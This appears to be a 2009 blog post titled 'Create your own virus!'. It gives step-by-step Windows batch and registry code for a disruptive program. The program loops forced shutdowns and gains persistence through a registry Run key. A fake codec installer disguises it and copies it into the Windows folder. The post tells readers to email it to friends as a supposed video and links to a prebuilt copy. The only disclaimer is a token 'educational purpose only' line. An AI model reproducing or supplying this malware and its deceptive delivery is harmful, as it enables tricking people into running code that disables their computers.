Wednesday, August 5, 2009

Create your own virus!



After reading on the next day, you will see your friend pleading for a remedy from you or you will hear your friends computer being formatted. Confused ??? Well, here you will learn to make a simple virus, which will shut down your computer as soon as you started it!! Excited ??? Well, lets get started then.







NOTE :
Before making it, go to Control Panel > Folder Option > View and uncheck : Hide extention for known file types.

For this, you need :
  • Windows 95/98/ 2000/ XP/ Vista/ 7 .
  • Your friend's email id.
  • Your email id.
  • Internet connection.
  • Notepad or other word processor that can handle bat files.
  • A little creativity!
If you are lazy skip to STEP "LAZY":

STEP 1:
Open notepad and type the following:

:s
shutdown -s -f -t 60 -c "(Any message here)"
notepad
goto :s

Note: Replace (Any message here) with your message. But the message should be enclosed within " " .

Save it with the name : decoder.ex_

STEP 2:

Again open notepad and type :

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"My Virus"="C:\\WINDOWS\\hp.bat"

Save it with the name : decoderreg.re_

STEP 3:

Take any small video (or any file above 2 mb) and rename it as : itsthevideo.av_

STEP 4:

Now for the setup. Again open notepad and type :

echo off
echo Now installing Sandecoder ver 1.2.1.9, one of the best codec.............
copy
decoder.ex_ C:\WINDOWS\hp.bat
copy itsthevideo.av_ itsthevideo.avi

copy decoderreg.re_ decoderreg.reg
decoderreg.reg
echo Confirm the message.
echo Done!
pause

del decoderreg.re_
del decoderreg.reg
del itsthevideo.av_
del
decoder.ex_
shutdown -r -f -t 3600 -c "To complete the installation, you need to restart your computer!"

Save it as Installer.bat and the virus is complete.

STEP "LAZY":

If you are lazy, then go to : http://www.esnips.com/doc/6f63415b-20dc-4ba6-a510-8d4f2ab39918/Virus

STEP "F.I.N.A.L.":

RAR it and E-Mail it to your friends telling that it is a video!
If you want the antidote, go to : http://www.esnips.com/doc/6f63415b-20dc-4ba6-a510-8d4f2ab39918/Virus

Download it, extract it, convert it, e-mail Virus_Antidote.zip to your victims!


NOTE: This article is experimental and educational purpose only!

A similar video I found in youtube :




Image from iStockPhoto




No comments:

Post a Comment